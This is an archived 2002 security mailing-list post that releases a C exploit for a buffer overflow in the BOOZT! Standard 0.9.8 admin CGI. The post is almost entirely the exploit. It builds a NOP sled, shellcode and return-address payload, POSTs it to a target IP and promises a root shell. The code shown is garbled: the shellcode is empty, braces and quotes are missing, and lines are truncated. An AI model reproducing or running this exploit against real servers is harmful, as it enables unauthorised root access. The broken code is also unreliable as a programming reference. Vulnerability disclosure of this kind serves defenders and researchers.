BOOZT! Standard CGI Vulnerability : Exploit Released

From: NIKEBOYat_private
Date: Wed Jan 09 2002 - 15:19:43 PST

  • Next message: Trey Valenta: " vulnerability"

    here is the exploit for the vulnerability i posted some days ago.
    /* -----------------------------------------
            BOOZT! Standard 0.9.8 CGI vulnerability exploit
            Rafael San Miguel Carrasco
       -----------------------------------------  */
    #include <netinet/in.h>
    #define PORT 8080
    #define BUFLEN 1597
    #define RET 0xbffff297
    #define NOP 0x90
    int main (int argc, char **argv) {
            int sockfd, i, cont;
            struct sockaddr_in dest;
            int html_len = 15;
            char cgicontent[2048];
            char buf[BUFLEN];
            char shellcode[]=
            char *html[15] = {
                    "POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n",
                    "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
                    "Accept-Language: es, en\n",
                    "Content-Type: application/x-www-form-urlencoded\n",
                    "UA-pixels: 640x480\n",
                    "UA-color: color8\n",
                    "UA-OS: Windows 95\n",
                    "UA-CPU: x86\n",
                    "User-Agent: Mozilla/2.0 (compatible; MSIE 3.0; Windows 95)\n",
                    "Connection: Keep-Alive\n",
                    "Content-Length: 1776\n",
                    "Pragma: No-Cache\n",
            if (argc < 2) {
                    printf ("usage: %s <IP>\n", argv[0]);
                    exit (-1);
            printf ("----------\n");
            printf (" BOOZT! Standard exploit\n");
            printf ("----------\n");
            printf ("Rafael San Miguel Carrasco (_kiss_)\n");
            printf ("rsanmcarat_private\n");
            printf ("----------\n");
            for (i = 0; i < BUFLEN; i+=4)
                    *( (long *) &buf[i]) = RET;
            for (i = 0; i < (BUFLEN - 16); i++)
                    buf[i] = NOP;
            cont = 0;
            for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
                    buf[i] = shellcode [cont++];
            strcpy (cgicontent, "name=");
            strncat (cgicontent, buf, sizeof (buf));
            strcat (cgicontent,
            printf ("connecting ...\n");
            if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) {
                    perror ("socket");
                    exit (-1);
            bzero (&dest, sizeof (dest));
            dest.sin_family = AF_INET;
            dest.sin_port = htons (PORT);
            dest.sin_addr.s_addr = inet_addr (argv[1]);
            if (connect (sockfd, &dest, sizeof (dest)) < 0) {
                    perror ("connect");
                    exit (-1);
            printf ("connected. sending buffer ...\n");
            for (i = 0; i < html_len; i++) {
                    if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
                            perror ("write");
                            exit (-1);
            if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
                    perror ("write cgicontent");
                    exit (-1);
            if (close (sockfd) < 0) {
                    perror ("close");
                    exit (-1);
            printf ("there should be a rootshell in /tmp.\n\n");
            return 0;

    This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 16:56:56 PST